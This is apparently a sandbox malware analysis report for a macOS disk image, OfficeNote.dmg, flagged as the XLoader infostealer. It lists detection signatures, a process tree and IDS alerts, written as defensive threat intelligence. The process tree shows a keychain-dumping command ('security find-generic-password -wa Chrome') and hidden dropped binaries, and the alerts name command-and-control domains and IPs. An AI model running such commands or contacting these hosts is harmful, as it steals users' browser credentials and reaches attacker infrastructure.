
macOS Analysis Report
OfficeNote.dmg

Overview

General Information

Sample Name: OfficeNote.dmg
Analysis ID: 3305820
MD5: 8f8444dc9486a7f770c34b6d7cb67c05
SHA1: 5946452d1537cf2a0e28c77fa278554ce631223c
SHA256: 453e155722ac23771d63418e39f88430b0a922bd5f4afa81dcc73db44571b79e
Infos:

Detection

XLoader
Score: 84
Range: 0 - 100
Whitelisted: false

Signatures

Searches for passwords in macOS's keychain
Snort IDS alert for network traffic
Yara detected XLoader
Writes Mach-O files to hidden directories
Accesses directories and/or files with sensitive browser data likely for credential stealing
Executes the "security" command used to access the keychain
Contains symbols with suspicious names likely related to anti-analysis
Executes hidden files
Creates memory-persistent launch services
Creates user-wide 'launchd' managed services aka launch agents
HTTP GET or POST without a user agent
Creates hidden files, links and/or directories
Mach-O contains sections with high entropy indicating compressed/encrypted content
Executes commands using a shell command-line interpreter
Writes 64-bit Mach-O files to disk
Creates application bundles
Executes the "rm" command used to delete files or directories

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox Version:
Analysis ID: 3305820
Start date and time: 2023-08-23 14:51:42 +02:00
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 8m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, Apple Silicon ARM64, Ventura
macOS major version: 13
CPU architecture: arm64
Analysis Mode: default
Sample file name: OfficeNote.dmg
Detection: MAL
Classification: mal84.troj.spyw.evad.macDMG@0/7@46/0
  • Excluded IPs from analysis (whitelisted): 2.21.20.142, 2.21.20.146, 2.21.20.144, 2.21.20.141, 2.21.20.147, 2.21.20.139, 2.21.20.143, 2.21.20.140, 2.21.20.145, 192.229.221.95, 23.50.131.209, 23.50.131.205, 23.35.236.24, 23.206.208.134
  • Excluded domains from analysis (whitelisted): iadsdk.apple.com.edgekey.net, e673.dsce9.akamaiedge.net, a2047.dscapi9.akamai.net, stocks-data-service.apple.com, a1091.dscw154.akamai.net, weather-data.apple.com.akadns.net, iadsdk.apple.com, ocsp.digicert.com, weather-data.apple.com.akamaized.net, weather-data.apple.com, ocsp.edge.digicert.com, stocks-data-service.lb-apple.com.akadns.net, e4805.dsca.akamaiedge.net, stocks-data-service.apple.com.edgesuite.net, iadsdk.apple.com.akadns.net
Command: open "/Volumes/OfficeNote/OfficeNote.app"
PID: 1004
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:

Standard Error:
  • System is mac-arm-ventura
  • open (MD5: ef617087070a1fd1b01573fd9668328c) Arguments: /usr/bin/open /Volumes/OfficeNote/OfficeNote.app
  • launchd New Fork (PID: 1005, Parent: 1)
  • xpcproxy (MD5: ec5cba9702c028c784fa75e8214bc95e) Arguments: xpcproxy application.OfficeNote.19.25
  • OfficeNote (MD5: 42f942691bec23b60dcd5a587a2ec43f) Arguments: /Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote
    • sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c /Users/rodrigo/73a470tO
    • bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c /Users/rodrigo/73a470tO
    • 73a470tO (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/73a470tO
      • 73a470tO New Fork (PID: 1010, Parent: 1007)
      • sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
      • bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
      • wvz4oTFps (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
      • wvz4oTFps (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
        • sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c security find-generic-password -wa 'Chrome'
        • bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c security find-generic-password -wa 'Chrome'
        • security (MD5: 05bb69f46a91f9b057f2e279de6a9435) Arguments: security find-generic-password -wa Chrome
        • sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c rm /Users/rodrigo/obdL0Dl8
        • bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c rm /Users/rodrigo/obdL0Dl8
        • rm (MD5: dba08d0ccaff1fa37865ef9a1c8ed34d) Arguments: rm /Users/rodrigo/obdL0Dl8
  • cleanup
Source | Rule | Description | Author
/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps | JoeSecurity_XLoader | Yara detected XLoader | Joe Security
/Users/rodrigo/73a470tO | JoeSecurity_XLoader | Yara detected XLoader | Joe Security


      AV Detection

Source: Yara match; File source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps, type: DROPPED
Source: Yara match; File source: /Users/rodrigo/73a470tO, type: DROPPED

      Networking

Source: Traffic; Snort IDS: 2047697 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .growind .info) 192.168.0.56:55180 -> 4.2.2.1:53
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49165 -> 66.29.151.121:80
Source: Traffic; Snort IDS: 2047695 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com) 192.168.0.56:54298 -> 4.2.2.1:53
Source: Traffic; Snort IDS: 2047695 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com) 192.168.0.56:57483 -> 4.2.2.2:53
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49166 -> 137.220.225.54:80
Source: Traffic; Snort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:60999 -> 4.2.2.2:53
Source: Traffic; Snort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:63416 -> 4.2.2.1:53
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49167 -> 192.0.78.25:80
Source: Traffic; Snort IDS: 2047691 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .spv88 .online) 192.168.0.56:54348 -> 4.2.2.1:53
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49168 -> 188.114.96.3:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49169 -> 146.148.179.231:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49170 -> 104.21.71.149:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49171 -> 185.215.4.57:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49173 -> 192.0.78.25:80
Source: Traffic; Snort IDS: 2047693 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud) 192.168.0.56:55184 -> 4.2.2.2:53
Source: Traffic; Snort IDS: 2047693 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud) 192.168.0.56:64276 -> 4.2.2.1:53
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49175 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2047686 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .brioche-amsterdam .com) 192.168.0.56:57563 -> 4.2.2.1:53
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49177 -> 104.21.26.182:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49179 -> 172.67.200.50:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49180 -> 66.29.151.121:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49182 -> 137.220.225.54:80
Source: Traffic; Snort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:64207 -> 4.2.2.1:53
Source: Traffic; Snort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:57571 -> 4.2.2.2:53
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49184 -> 192.0.78.25:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49186 -> 188.114.96.3:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49188 -> 146.148.179.231:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49190 -> 104.21.71.149:80